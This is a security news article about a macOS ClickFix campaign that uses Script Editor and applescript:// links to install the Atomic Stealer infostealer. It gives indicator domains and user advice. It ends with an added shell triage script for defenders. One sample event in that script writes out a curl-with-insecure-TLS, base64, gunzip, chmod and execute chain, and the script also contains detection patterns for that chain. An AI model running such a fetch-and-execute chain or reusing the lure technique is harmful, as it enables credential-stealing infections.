A new ClickFix campaign targeting macOS uses Script Editor, rather than Terminal, to deploy the Atomic Stealer infostealer, sidestepping the paste protection Apple recently added to Terminal. The shift shows how quickly attackers adapt to strengthened platform controls, and that the campaign still depends entirely on social engineering: no vulnerability is exploited, the victim runs the script themselves.
Exploiting Apple’s Security Enhancements
Historically, ClickFix attacks have tricked users into pasting and running malicious commands in Terminal under the guise of routine maintenance. Apple's response in macOS 26.4 was a check on commands pasted into Terminal, which makes that lure harder to pull off. Attackers have now redirected their efforts to Script Editor, the built-in AppleScript authoring and automation tool, which has been abused for malware delivery before.
Jamf Threat Labs found the new method through behavioral analysis, flagging the unexpected launch of Script Editor as suspicious rather than matching a known file or domain. The attackers open Script Editor directly from the web browser through the applescript:// URL scheme, so Terminal, and the new Terminal paste check, never enter the picture. The discovery illustrates how fast threat actors move once a security control closes one path.
Deceptive Web Pages and User Manipulation
The attack begins on a deceptive Apple-themed website posing as a disk space management tool, with step-by-step guidance that mimics legitimate macOS procedures. Clicking the page's Execute button follows an applescript:// link; the browser responds with its standard permission prompt asking whether to open Script Editor, and because that is a normal macOS dialog the malicious activity looks routine. That prompt is the last point at which the user can stop the chain without running anything.
Script Editor then opens with the attacker's script already loaded, its text claiming to free up storage, which lends the whole sequence credibility. On macOS 26.4 the script must be saved before it can be run, so the victim performs one more deliberate step, but it is a step rather than a warning, and the lure page's instructions account for it.
Payload Execution and Security Recommendations
Running the script starts the attack chain. Obfuscated string operations assemble the download URL at runtime so it does not appear in the script as a readable literal, and curl fetches the payload with TLS certificate validation disabled (curl's -k/--insecure behaviour), so the download succeeds even from a host whose certificate would not otherwise be trusted. The payload arrives base64-encoded and gzip-compressed; the script decodes and decompresses it into a Mach-O binary, executes it, and Atomic Stealer is running on the system.
Known indicators of compromise include the domains dryvecar.com and storage-fixes.squarespace.com, both tied to the fraudulent ClickFix pages. Users should not run scripts supplied by unfamiliar web pages, and should decline any browser prompt to open Script Editor that they did not deliberately trigger themselves. Keeping macOS up to date ensures the latest protections, including the Terminal paste check, are in place, but as this campaign shows, such controls narrow the attack rather than remove it.
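As an added example (not part of the original article and not Jamf's detection logic), the shell script below turns the three observations above into triage rules and runs them over constructed sample events: a browser requesting the applescript:// scheme, a shell command that fetches with curl's certificate validation disabled and pipes the result through base64 and gzip decoding, and a DNS lookup of one of the published domains. The tab-separated event format, the source-app names, the shape of the applescript:// URL and the example.invalid URL are all assumptions made for the demonstration; the IOC domains are the ones named in the article.

```shell
#!/bin/sh
# Triage helper for the behaviours described in the article.  Example added
# for this page, not Jamf's detection logic.  The event format (id, kind,
# source app, detail, tab-separated), the sample events, the browser list and
# the example.invalid URL are constructed assumptions.

TAB=$(printf '\t')

# Constructed sample events: e1-e3 reproduce the article's chain, e4-e6 are
# benign look-alikes that the rules must not flag.
SAMPLE_EVENTS=$(
  printf '%s\t%s\t%s\t%s\n' \
    e1 open Safari 'applescript://com.apple.scripteditor?action=new&script=display%20dialog' \
    e2 dns  Safari 'storage-fixes.squarespace.com' \
    e3 exec 'Script Editor' '/bin/sh -c "curl -sk https://example.invalid/p | base64 -d | gunzip > /tmp/x && chmod +x /tmp/x && /tmp/x"' \
    e4 exec Terminal 'curl -sS https://example.invalid/pkg.tgz -o pkg.tgz' \
    e5 open Finder 'https://example.invalid/../Users/alice/Scripts/backup.scpt' \
    e6 dns  Safari 'www.apple.com'
)

# Rule 1: a web browser (assumed list) asking to open the applescript:// scheme
# or Script Editor itself.  Finder or a terminal opening a .scpt is normal.
is_browser_script_editor_launch() {   # $1 = source app, $2 = open target
  case "$1" in
    Safari|"Google Chrome"|Firefox|"Microsoft Edge"|Brave*|Arc) ;;
    *) return 1 ;;
  esac
  case "$2" in
    applescript://*|*"Script Editor.app"*) return 0 ;;
    *) return 1 ;;
  esac
}

# Rule 2: curl told to skip TLS validation (-k in any flag cluster, or
# --insecure), with base64 decoding and gzip decompression in the same command.
is_insecure_fetch_decode_chain() {   # $1 = command line
  printf '%s' "$1" | grep -Eq 'curl[^|]*( -[A-Za-z]*k[A-Za-z]*|--insecure)' || return 1
  printf '%s' "$1" | grep -Eq 'base64 +(-d|-D|--decode)' || return 1
  printf '%s' "$1" | grep -Eq '(gunzip|gzip +(-d|--decompress))'
}

# Rule 3: the domains published as indicators for the ClickFix pages.
is_ioc_domain() {   # $1 = hostname
  case "$1" in
    dryvecar.com|storage-fixes.squarespace.com) return 0 ;;
    *) return 1 ;;
  esac
}

# Walk the event stream and print one "ALERT <rule> <id>" line per match.
triage_events() {   # $1 = newline-separated events
  printf '%s\n' "$1" | while IFS="$TAB" read -r id kind src detail; do
    [ -n "$id" ] || continue
    case "$kind" in
      open) if is_browser_script_editor_launch "$src" "$detail"; then
              echo "ALERT browser-launched-script-editor $id"; fi ;;
      exec) if is_insecure_fetch_decode_chain "$detail"; then
              echo "ALERT insecure-fetch-decode-chain $id"; fi ;;
      dns)  if is_ioc_domain "$detail"; then
              echo "ALERT clickfix-ioc-domain $id"; fi ;;
    esac
  done
}

# Number of alerts raised for an event stream.
count_alerts() { triage_events "$1" | grep -c '^ALERT'; }

# Run stand-alone: prints the alerts for e1, e2 and e3 only.
triage_events "$SAMPLE_EVENTS"
```

In practice the events come from the Endpoint Security framework or the unified log and need mapping onto these four fields; the point of the layout is that rule 1 fires before any payload is downloaded, rule 2 does not depend on the lure domain, and only rule 3 goes stale when the attackers register new sites.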
